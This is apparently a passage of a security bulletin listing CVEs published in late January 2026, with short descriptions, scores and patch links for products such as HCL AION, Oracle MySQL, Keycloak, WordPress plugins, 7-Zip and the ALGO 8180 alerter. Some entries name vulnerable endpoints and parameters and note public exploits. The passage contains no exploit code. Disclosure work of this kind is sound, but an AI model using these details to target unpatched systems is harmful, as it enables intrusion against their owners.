| HCL Software--AION | HCL AION is affected by a Missing Security Response Headers vulnerability. The absence of standard security headers may weaken the application's overall security posture and increase its susceptibility to common web-based attacks. | 2026-01-19 | 3.5 | CVE-2025-55249 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION is affected by an Unrestricted File Upload vulnerability. This can allow malicious file uploads, potentially resulting in unauthorized code execution or system compromise. | 2026-01-19 | 3.1 | CVE-2025-55251 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION version 2 is affected by a Weak Password Policy vulnerability. This can allow the use of easily guessable passwords, potentially resulting in unauthorized access. | 2026-01-19 | 3.1 | CVE-2025-55252 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION version 2 is affected by a Cacheable HTTP Response vulnerability. This may lead to unintended storage of sensitive or dynamic content, potentially resulting in unauthorized access or information disclosure. | 2026-01-19 | 2.8 | CVE-2025-52659 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION is affected by an Unrestricted File Upload vulnerability. This can allow malicious file uploads, potentially resulting in unauthorized code execution or system compromise. | 2026-01-19 | 2.7 | CVE-2025-52660 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION version 2 is affected by a JWT Token Expiry Too Long vulnerability. This may increase the risk of token misuse, potentially resulting in unauthorized access if the token is compromised. | 2026-01-19 | 2.4 | CVE-2025-52661 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION version 2 is affected by a Technical Error Disclosure vulnerability. This can expose sensitive technical details, potentially resulting in information disclosure or aiding further attacks. | 2026-01-19 | 1.8 | CVE-2025-55250 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| IBM--ApplinX | IBM ApplinX 11.1 could allow an authenticated user to perform unauthorized administrative actions on the server due to server-side enforcement of client-side security. | 2026-01-20 | 3.1 | CVE-2025-36410 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--ApplinX | IBM ApplinX 11.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. | 2026-01-20 | 3.5 | CVE-2025-36411 | https://www.ibm.com/support/pages/node/7257446 |
| lcg0124--BootDo | A weakness has been identified in lcg0124 BootDo up to e93dd428ef6f5c881aa74d49a2099ab0cf1e0fcb. Affected is the function Save of the file /blog/bContent/save of the component ContentController. This manipulation of the argument content/author/title causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. | 2026-01-19 | 3.5 | CVE-2026-1136 | VDB-341726 \| lcg0124 BootDo ContentController save cross site scripting VDB-341726 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #735164 \| BootDo V1.0 Cross Site Scripting https://github.com/webzzaa/CVE-/issues/4 |
| lcg0124--BootDo | A vulnerability was determined in lcg0124 BootDo up to 5ccd963c74058036b466e038cff37de4056c1600. Affected by this vulnerability is the function redirectToLogin of the file AccessControlFilter.java of the component Host Header Handler. This manipulation of the argument Hostname causes open redirect. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. | 2026-01-25 | 3.5 | CVE-2026-1406 | VDB-342794 \| lcg0124 BootDo Host Header AccessControlFilter.java redirectToLogin VDB-342794 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #736271 \| BootDo web V1.0 Host header injection https://github.com/webzzaa/CVE-/issues/5 |
| libexpat project--libexpat | In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data. | 2026-01-23 | 2.9 | CVE-2026-24515 | https://github.com/libexpat/libexpat/pull/1131 |
| lobehub--lobe-chat | LobeChat is an open source chat application platform. Prior to version 2.0.0-next.193, the `knowledgeBase.removeFilesFromKnowledgeBase` tRPC endpoint allows authenticated users to delete files from any knowledge base without verifying ownership. The `userId` filter in the database query is commented out, enabling attackers to delete other users' KB files if they know the knowledge base ID and file ID. While the vulnerability is confirmed, practical exploitation requires knowing the target's KB ID and file ID. These IDs are random and not easily enumerable. However, IDs may leak through shared links, logs, referrer headers and so on. The missing authorization check is a critical security flaw regardless. Users should upgrade to version 2.0.0-next.193 to receive a patch. | 2026-01-19 | 3.7 | CVE-2026-23522 | https://github.com/lobehub/lobe-chat/security/advisories/GHSA-j7xp-4mg9-x28r https://github.com/lobehub/lobe-chat/commit/2c1762b85acb84467ed5e799afe1499cd2f912e6 |
| MineAdmin--MineAdmin | A security vulnerability has been detected in MineAdmin 1.x/2.x. Affected is an unknown function of the file /system/getFileInfoById. Such manipulation of the argument ID leads to information disclosure. It is possible to launch the attack remotely. The attack requires a high level of complexity. Exploitation is said to be difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 3.1 | CVE-2026-1196 | VDB-341781 \| MineAdmin getFileInfoById information disclosure VDB-341781 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734273 \| MineAdmin MineAdmin Enterprise Backend Management System MineAdmin v1.x MineAdmin v2.x getFileInfoById Arbitrary File Read Vulnerability https://github.com/SourByte05/MineAdmin-Vulnerability/issues/3 |
| MineAdmin--MineAdmin | A vulnerability was detected in MineAdmin 1.x/2.x. Affected by this vulnerability is an unknown functionality of the file /system/downloadById. Performing a manipulation of the argument ID results in information disclosure. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitation appears to be difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 3.1 | CVE-2026-1197 | VDB-341782 \| MineAdmin downloadById information disclosure VDB-341782 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734274 \| MineAdmin MineAdmin Enterprise Backend Management System MineAdmin v1.x MineAdmin v2.x downloadById Arbitrary File Download Vulnerability https://github.com/SourByte05/MineAdmin-Vulnerability/issues/2 |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Pluggable Auth). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L). | 2026-01-20 | 2.7 | CVE-2026-21965 | Oracle Advisory |
| Oracle Corporation--Oracle Java SE | Vulnerability in Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u471-b50. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). | 2026-01-20 | 3.1 | CVE-2026-21947 | Oracle Advisory |
| Oracle Corporation--Oracle Zero Data Loss Recovery Appliance Software | Vulnerability in the Oracle Zero Data Loss Recovery Appliance Software product of Oracle Zero Data Loss Recovery Appliance (component: Security). Supported versions that are affected are 23.1.0-23.1.202509. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Oracle Net to compromise Oracle Zero Data Loss Recovery Appliance Software. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Zero Data Loss Recovery Appliance Software accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). | 2026-01-20 | 3.1 | CVE-2026-21977 | Oracle Advisory |
| Oracle Corporation--Oracle ZFS Storage Appliance Kit | Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Filesystems). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle ZFS Storage Appliance Kit accessible data. CVSS 3.1 Base Score 2.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). | 2026-01-20 | 2.3 | CVE-2026-21930 | Oracle Advisory |
| pbrong--hrms | A vulnerability was detected in pbrong hrms 1.0.1. The affected element is the function UpdateRecruitmentById of the file /handler/recruitment.go. The manipulation results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used. | 2026-01-19 | 3.5 | CVE-2026-1161 | VDB-341755 \| pbrong hrms recruitment.go UpdateRecruitmentById cross site scripting VDB-341755 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #736510 \| Pbrong hrms 1.0.1 Stored Cross Site Scripting Vulnerability https://github.com/TheLiao233/cve/issues/1 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in the Keycloak server during refresh token processing, specifically in the TokenManager class responsible for enforcing refresh token reuse policies. When strict refresh token rotation is enabled, the validation and update of refresh token usage are not performed atomically. This allows concurrent refresh requests to bypass single-use enforcement and issue multiple access tokens from the same refresh token. As a result, Keycloak's refresh token rotation hardening can be undermined. | 2026-01-21 | 3.1 | CVE-2026-1035 | https://access.redhat.com/security/cve/CVE-2026-1035 RHBZ#2430314 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in the Keycloak Admin REST API. This vulnerability allows the exposure of backend schema and rules, potentially leading to targeted attacks or privilege escalation via improper access control. | 2026-01-21 | 2.7 | CVE-2025-14083 | https://access.redhat.com/security/cve/CVE-2025-14083 RHBZ#2419086 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS). | 2026-01-21 | 3.7 | CVE-2026-0988 | https://access.redhat.com/security/cve/CVE-2026-0988 RHBZ#2429886 |
| roxnor--MetForm Contact Form, Survey, Quiz, & Custom Form Builder for Elementor | The MetForm - Contact Form, Survey, Quiz, & Custom Form Builder for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.1.0. This is due to the use of a forgeable cookie value derived only from the entry ID and current user ID without a server-side secret. This makes it possible for unauthenticated attackers to access form submission entry data via MetForm shortcodes for entries created within the transient TTL (default is 15 minutes). | 2026-01-24 | 3.7 | CVE-2026-0633 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d72cc420-1ff5-403b-b4ea-7c820fdebcf3?source=cve https://plugins.trac.wordpress.org/changeset/3438419/metform |
| SourceCodester--Patients Waiting Area Queue Management System | A vulnerability has been found in SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System 1.0. Affected by this issue is some unknown functionality of the file /php/api_register_patient.php. Such manipulation of the argument firstName/lastName leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2026-01-19 | 3.5 | CVE-2026-1146 | VDB-341739 \| SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System api_register_patient.php cross site scripting VDB-341739 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #735543 \| Patrick Mvuma Patients Waiting Area Queue Management System 1.0 Cross Site Scripting |
| SourceCodester--Patients Waiting Area Queue Management System | A vulnerability was found in SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System 1.0. This affects an unknown part of the file /php/api_patient_schedule.php. Performing a manipulation of the argument Reason results in cross site scripting. It is possible to initiate the attack remotely. The exploit has been made public and could be used. | 2026-01-19 | 3.5 | CVE-2026-1147 | VDB-341740 \| SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System api_patient_schedule.php cross site scripting VDB-341740 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #735544 \| Patrick Mvuma Patients Waiting Area Queue Management System 1.0 Cross Site Scripting |
| technical-laohu--mpay | A weakness has been identified in technical-laohu mpay up to 1.2.4. The affected element is an unknown function of the component User Center. This manipulation of the argument Nickname causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-19 | 2.4 | CVE-2026-1151 | VDB-341744 \| technical-laohu mpay User Center cross site scripting VDB-341744 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #735773 \| https://gitee.com/technical-laohu/mpay mpay v1.2.4 Stored Cross-Site Scripting https://github.com/bdkuzma/vuln/issues/16 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 7-Zip--7-Zip | 7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories. An attacker can leverage this vulnerability to execute code in the context of a service account. Was ZDI-CAN-26743. | 2026-01-23 | not yet calculated | CVE-2025-11002 | ZDI-25-950 |
| AA-Team--SearchAzon | Cross-Site Request Forgery (CSRF) vulnerability in AA-Team SearchAzon searchazon allows Cross Site Request Forgery. This issue affects SearchAzon: from n/a through <= 1.4. | 2026-01-22 | not yet calculated | CVE-2026-22360 | https://patchstack.com/database/Wordpress/Plugin/searchazon/vulnerability/wordpress-searchazon-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| AA-Team--Wordpress Movies Bulk Importer | Cross-Site Request Forgery (CSRF) vulnerability in AA-Team Wordpress Movies Bulk Importer movies importer allows Cross Site Request Forgery. This issue affects Wordpress Movies Bulk Importer: from n/a through <= 1.0. | 2026-01-22 | not yet calculated | CVE-2026-22359 | https://patchstack.com/database/Wordpress/Plugin/movies%20importer/vulnerability/wordpress-wordpress-movies-bulk-importer-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Abacre--Abacre | Abacre Retail Point of Sale 14.0.0.396 is vulnerable to content-based blind SQL injection. The vulnerability exists in the Search function of the Orders page. | 2026-01-20 | not yet calculated | CVE-2025-67261 | https://www.abacre.com/retailpointofsale/ https://packetstorm.news/files/id/214046/ |
| Abacre--Abacre | Abacre Retail Point of Sale 14.0.0.396 is affected by a stored cross-site scripting (XSS) vulnerability in the Clients module. The application fails to properly sanitize user-supplied input stored in the Name and Surname fields. An attacker can insert malicious HTML or script content into these fields, which is then persisted in the database. | 2026-01-20 | not yet calculated | CVE-2025-67263 | https://www.abacre.com/retailpointofsale/ https://packetstorm.news/files/id/214045/ |
| ABCdatos--Protección de datos – RGPD | Missing Authorization vulnerability in ABCdatos Protección de datos – RGPD proteccion-datos-rgpd allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Protección de datos – RGPD: from n/a through <= 0.68. | 2026-01-23 | not yet calculated | CVE-2026-24539 | https://patchstack.com/database/Wordpress/Plugin/proteccion-datos-rgpd/vulnerability/wordpress-proteccion-de-datos-rgpd-plugin-0-68-broken-access-control-vulnerability?_s_id=cve |
| Ability, Inc--Web Accessibility with Max Access | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ability, Inc Web Accessibility with Max Access accessibility-toolbar allows Stored XSS. This issue affects Web Accessibility with Max Access: from n/a through <= 2.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24629 | https://patchstack.com/database/Wordpress/Plugin/accessibility-toolbar/vulnerability/wordpress-web-accessibility-with-max-access-plugin-2-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AbsolutePlugins--Absolute Addons For Elementor | Missing Authorization vulnerability in AbsolutePlugins Absolute Addons For Elementor absolute-addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Absolute Addons For Elementor: from n/a through <= 1.0.14. | 2026-01-22 | not yet calculated | CVE-2026-22468 | https://patchstack.com/database/Wordpress/Plugin/absolute-addons/vulnerability/wordpress-absolute-addons-for-elementor-plugin-1-0-14-broken-access-control-vulnerability?_s_id=cve |
| adamlabs--WordPress Photo Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in adamlabs WordPress Photo Gallery photo-gallery-portfolio allows Reflected XSS. This issue affects WordPress Photo Gallery: from n/a through <= 1.1.0. | 2026-01-22 | not yet calculated | CVE-2025-53240 | https://patchstack.com/database/Wordpress/Plugin/photo-gallery-portfolio/vulnerability/wordpress-wordpress-photo-gallery-plugin-1-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| agmorpheus--Syntax Highlighter Compress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in agmorpheus Syntax Highlighter Compress syntax-highlighter-compress allows Reflected XSS. This issue affects Syntax Highlighter Compress: from n/a through <= 3.0.83.3. | 2026-01-22 | not yet calculated | CVE-2025-68859 | https://patchstack.com/database/Wordpress/Plugin/syntax-highlighter-compress/vulnerability/wordpress-syntax-highlighter-compress-plugin-3-0-83-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AivahThemes--Anona | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Anona anona allows Path Traversal. This issue affects Anona: from n/a through <= 8.0. | 2026-01-22 | not yet calculated | CVE-2025-68901 | https://patchstack.com/database/Wordpress/Theme/anona/vulnerability/wordpress-anona-theme-8-0-arbitrary-file-deletion-vulnerability?_s_id=cve |
| AivahThemes--Anona | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Anona anona allows Path Traversal. This issue affects Anona: from n/a through <= 8.0. | 2026-01-22 | not yet calculated | CVE-2025-68902 | https://patchstack.com/database/Wordpress/Theme/anona/vulnerability/wordpress-anona-theme-8-0-arbitrary-file-download-vulnerability?_s_id=cve |
| AivahThemes--Anona | Deserialization of Untrusted Data vulnerability in AivahThemes Anona anona allows Object Injection. This issue affects Anona: from n/a through <= 8.0. | 2026-01-22 | not yet calculated | CVE-2025-68903 | https://patchstack.com/database/Wordpress/Theme/anona/vulnerability/wordpress-anona-theme-8-0-php-object-injection-vulnerability?_s_id=cve |
| AivahThemes--Hostme v2 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Hostme v2 hostmev2 allows Path Traversal. This issue affects Hostme v2: from n/a through <= 7.0. | 2026-01-22 | not yet calculated | CVE-2025-68907 | https://patchstack.com/database/Wordpress/Theme/hostmev2/vulnerability/wordpress-hostme-v2-theme-7-0-arbitrary-file-deletion-vulnerability?_s_id=cve |
| Alejandro--Quick Restaurant Reservations | Missing Authorization vulnerability in Alejandro Quick Restaurant Reservations quick-restaurant-reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Quick Restaurant Reservations: from n/a through <= 1.6.7. | 2026-01-23 | not yet calculated | CVE-2026-24529 | https://patchstack.com/database/Wordpress/Plugin/quick-restaurant-reservations/vulnerability/wordpress-quick-restaurant-reservations-plugin-1-6-7-broken-access-control-vulnerability?_s_id=cve |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Ping Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-25568. | 2026-01-23 | not yet calculated | CVE-2026-0779 | ZDI-26-001 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28289. | 2026-01-23 | not yet calculated | CVE-2026-0780 | ZDI-26-002 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28290. | 2026-01-23 | not yet calculated | CVE-2026-0781 | ZDI-26-003 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28291. | 2026-01-23 | not yet calculated | CVE-2026-0782 | ZDI-26-004 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28292. | 2026-01-23 | not yet calculated | CVE-2026-0783 | ZDI-26-005 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28293. | 2026-01-23 | not yet calculated | CVE-2026-0784 | ZDI-26-006 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter API Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the API interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28294. | 2026-01-23 | not yet calculated | CVE-2026-0785 | ZDI-26-007 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SCI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the SCI module. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28295. | 2026-01-23 | not yet calculated | CVE-2026-0786 | ZDI-26-008 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SAC Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SAC module. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28296. | 2026-01-23 | not yet calculated | CVE-2026-0787 | ZDI-26-009 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Persistent Cross-Site Scripting Vulnerability. This vulnerability allows remote attackers to execute web requests with a target user's privileges on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the functionality for viewing the syslog. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to interact with the application in the context of the target user. Was ZDI-CAN-28298. | 2026-01-23 | not yet calculated | CVE-2026-0788 | ZDI-26-010 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Inclusion of Authentication Cookie in Response Body Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper management of sensitive information. An attacker can leverage this vulnerability to disclose information in the context of the device. Was ZDI-CAN-28297. | 2026-01-23 | not yet calculated | CVE-2026-0789 | ZDI-26-011 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Direct Request Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based user interface. By navigating directly to a URL, a user can gain unauthorized access to data. An attacker can leverage this vulnerability to disclose information in the context of the device. Was ZDI-CAN-28299. | 2026-01-23 | not yet calculated | CVE-2026-0790 | ZDI-26-012 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SIP INVITE Replaces Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Replaces header of SIP INVITE requests. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28300. | 2026-01-23 | not yet calculated | CVE-2026-0791 | ZDI-26-013 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SIP INVITE Alert-Info Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Alert-Info header of SIP INVITE requests. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28301. | 2026-01-23 | not yet calculated | CVE-2026-0792 | ZDI-26-014 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter InformaCast Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the InformaCast functionality. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28302. | 2026-01-23 | not yet calculated | CVE-2026-0793 | ZDI-26-015 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SIP Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of SIP calls. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28303. | 2026-01-23 | not yet calculated | CVE-2026-0794 | ZDI-26-016 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28321. | 2026-01-23 | not yet calculated | CVE-2026-0795 | ZDI-26-017 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28322. | 2026-01-23 | not yet calculated | CVE-2026-0796 | ZDI-26-018 |
| AmentoTech--Workreap Core | Authentication Bypass Using an Alternate Path or Channel vulnerability in AmentoTech Workreap Core workreap_core allows Authentication Abuse. This issue affects Workreap Core: from n/a through <= 3.4.0. | 2026-01-22 | not yet calculated | CVE-2025-69101 | https://patchstack.com/database/Wordpress/Plugin/workreap_core/vulnerability/wordpress-workreap-core-plugin-3-4-0-account-takeover-vulnerability?_s_id=cve |
